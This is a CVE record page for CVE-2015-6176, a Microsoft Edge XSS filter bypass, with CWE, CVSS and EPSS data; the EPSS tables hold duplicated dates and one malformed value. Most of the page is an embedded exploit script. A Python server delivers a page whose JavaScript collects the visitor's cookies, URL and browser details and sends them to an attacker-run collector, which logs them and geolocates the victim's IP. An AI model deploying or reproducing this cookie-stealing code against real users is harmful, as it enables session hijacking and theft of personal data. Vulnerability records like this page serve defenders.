CVE-2015-6176

CVE Descriptions

Microsoft Edge mishandles HTML attributes in HTTP responses, which allows remote attackers to bypass a cross-site scripting (XSS) protection mechanism via unspecified vectors, aka "Microsoft Edge XSS Filter Bypass Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4.3		AV:N/AC:M/Au:N/C:N/I:P/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	22.82%	–	–
2022-02-27	–	–	22.82%	–	–
2022-04-03	–	–	22.82%	–	–
2022-07-17	–	–	22.82%	–	–
2022-07-24	–	–	22.82%	–	–
2022-07-31	–	–	22.82%	–	–
2022-08-07	–	–	22.82%	–	–
2022-09-18	–	–	22.82%	–	–
2022-10-16	–	–	24.06%	–	–
2023-03-12	–	–	–	85.65%	–
2023-04-23	–	–	–	32.98%	–
2023-09-03	–	–	–	28.91%	–
2023-10-01	–	–	–	31.6%	–
2023-11-05	–	–	–	37.57%	–
2023-12-10	–	–	–	34.3%	–
2024-02-11	–	–	–	27.39%	–
2024-04-14	–	–	–	23.81%	–
2024-06-02	–	–	–	23.81%	–
2024-08-25	–	–	–	18.31%	–
2025-01-05	–	–	–	51.56%	–
2025-02-23	–	–	–	39.41%	–
2025-01-19	–	–	–	51.56%	–
2025-02-23	–	–	–	39.41%	–
2025-03-18	–	–	–	–	24.83%
2025-03-30	–	–	–	–	18.96%
2025-06-30	–	–	–	–	24.02%
2025-07-23	–	–	–	–	3.62%
2025-07-23	–	–	–	–	3.62,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	94%
2022-02-27	95%
2022-04-03	96%
2022-07-17	97%
2022-07-24	96%
2022-07-31	97%
2022-08-07	96%
2022-09-18	97%
2022-10-16	97%
2023-03-12	98%
2023-04-23	96%
2023-09-03	96%
2023-10-01	96%
2023-11-05	97%
2023-12-10	97%
2024-02-11	97%
2024-04-14	97%
2024-06-02	97%
2024-08-25	96%
2025-01-05	98%
2025-02-23	97%
2025-01-19	98%
2025-02-23	97%
2025-03-18	96%
2025-03-30	95%
2025-06-30	96%
2025-07-23	87%
2025-07-23	87%

Exploit information

Exploit Database EDB-ID : 52372

Publication date : 2025-07-21 22h00 +00:00
Author : nu11secur1ty
EDB Verified : No

# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) # Author: nu11secur1ty # Date: 2025-07-18 # Vendor: Microsoft # Software: Microsoft Edge Browser # Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176 #!/usr/bin/python # nu11secur1ty CVE-2015-6176 import http.server import socketserver import socket import threading from urllib import parse import requests import datetime PORT = 8080 COLLECTOR_PORT = 9000 # HTML page with extended XSS exploit that sends lots of info via Image GET to collector HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html> <html lang=\\\"en\\\"> <head> <meta charset=\\\"UTF-8\\\" /> <title>XSS Edge Bypass PoC</title> <script> window.onload = function() { try { var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\"; var cookies = document.cookie || \\\"\\\"; var url = window.location.href; var referrer = document.referrer; var language = navigator.language || \\\"\\\"; var platform = navigator.platform || \\\"\\\"; var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || \\\"\\\"; var screenRes = screen.width + \\\"x\\\" + screen.height; var data = { cookie: cookies, url: url, referrer: referrer, language: language, platform: platform, timezone: timezone, screen: screenRes }; var query = Object.keys(data).map(function(k) { return encodeURIComponent(k) + \\\"=\\\" + encodeURIComponent(data[k]); }).join(\\\"&\\\"); var img = new Image(); img.src = attackerServer + \\\"?\\\" + query; } catch(e) { console.error(\\\"Error sending data:\\\", e); } }; </script> </head> <body> <h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1> <p>If this alert appears, XSS is executed.</p> </body> </html> \\\"\\\"\\\" # Collector page with large sea picture and centered message (Unicode allowed) COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html> <html lang=\\\"en\\\"> <head> <meta charset=\\\"UTF-8\\\" /> <title>Collected</title> <style> body { margin: 0; background: url(\\\' https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\') no-repeat center center fixed; background-size: cover; height: 100vh; display: flex; justify-content: center; align-items: center; color: white; font-family: Arial, sans-serif; font-size: 2em; text-shadow: 2px 2px 5px rgba(0,0,0,0.7); } </style> </head> <body> <div>Thank you for visiting the collector page </div> </body> </html> \\\"\\\"\\\" class ExploitHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): if self.path in (\\\'/\\\', \\\'/index.html\\\'): content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\", local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\", str(COLLECTOR_PORT).encode()) self.send_response(200) self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") self.send_header(\\\"Content-Length\\\", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) class CollectorHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): parsed_path = parse.urlparse(self.path) if parsed_path.path == \\\"/collect\\\": query = parse.parse_qs(parsed_path.query) cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0] url = query.get(\\\"url\\\", [\\\"\\\"])[0] referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0] language = query.get(\\\"language\\\", [\\\"\\\"])[0] platform = query.get(\\\"platform\\\", [\\\"\\\"])[0] timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0] screen = query.get(\\\"screen\\\", [\\\"\\\"])[0] ip = self.client_address[0] user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\") timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d %H:%M:%S\\\") location = self.get_location(ip) if cookie: print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\") print(f\\\" URL: {url}\\\") print(f\\\" Referrer: {referrer}\\\") print(f\\\" Language: {language}\\\") print(f\\\" Platform: {platform}\\\") print(f\\\" Timezone: {timezone}\\\") print(f\\\" Screen Resolution: {screen}\\\") print(f\\\" From IP: {ip}\\\") print(f\\\" User-Agent: {user_agent}\\\") print(f\\\" Location: {location}\\\") print(\\\"-\\\" * 50) # Save collected info to a file with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f: f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\") f.write(f\\\" URL: {url}\\\\n\\\") f.write(f\\\" Referrer: {referrer}\\\\n\\\") f.write(f\\\" Language: {language}\\\\n\\\") f.write(f\\\" Platform: {platform}\\\\n\\\") f.write(f\\\" Timezone: {timezone}\\\\n\\\") f.write(f\\\" Screen Resolution: {screen}\\\\n\\\") f.write(f\\\" IP: {ip}\\\\n\\\") f.write(f\\\" User-Agent: {user_agent}\\\\n\\\") f.write(f\\\" Location: {location}\\\\n\\\") f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\") self.send_response(200) self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") content = COLLECTOR_PAGE.encode(\\\'utf-8\\\') self.send_header(\\\"Content-Length\\\", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) def get_location(self, ip): # Use free IP info service; fallback gracefully if no internet try: resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3) if resp.status_code == 200: data = resp.json() city = data.get(\\\"city\\\", \\\"\\\") region = data.get(\\\"region\\\", \\\"\\\") country = data.get(\\\"country\\\", \\\"\\\") loc = data.get(\\\"loc\\\", \\\"\\\") return f\\\"{city}, {region}, {country} (coords: {loc})\\\" except Exception: pass return \\\"Location lookup failed or unavailable\\\" def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect((\\\"8.8.8.8\\\", 80)) ip = s.getsockname()[0] except Exception: ip = \\\"127.0.0.1\\\" finally: s.close() return ip def run_exploit_server(): with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd: print(f\\\"[*] Exploit server running at: http:// {local_ip}:{PORT}/index.html\\\") httpd.serve_forever() def run_collector_server(): with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as httpd: print(f\\\"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect\\\") httpd.serve_forever() if __name__ == \\\"__main__\\\": local_ip = get_local_ip() try: print(f\\\"[*] Your server IP is: {local_ip}\\\") exploit_thread = threading.Thread(target=run_exploit_server, daemon=True) exploit_thread.start() run_collector_server() except KeyboardInterrupt: print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\") ``` # Video: [href](https://www.youtube.com/watch?v=T2YLrFsvXOc) # Source: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176) # Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)

Products Mentioned

Configuraton 0

Microsoft>>Edge >> Version -

Microsoft>>Edge >> Version - (Open CPE detail)
Microsoft>>Edge >> Version - (Open CPE detail)
Microsoft>>Edge >> Version - (Open CPE detail)

References

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-125
Tags : vendor-advisory, x_refsource_MS

http://www.securitytracker.com/id/1034316
Tags : vdb-entry, x_refsource_SECTRACK

CVE-2015-6176 : Detail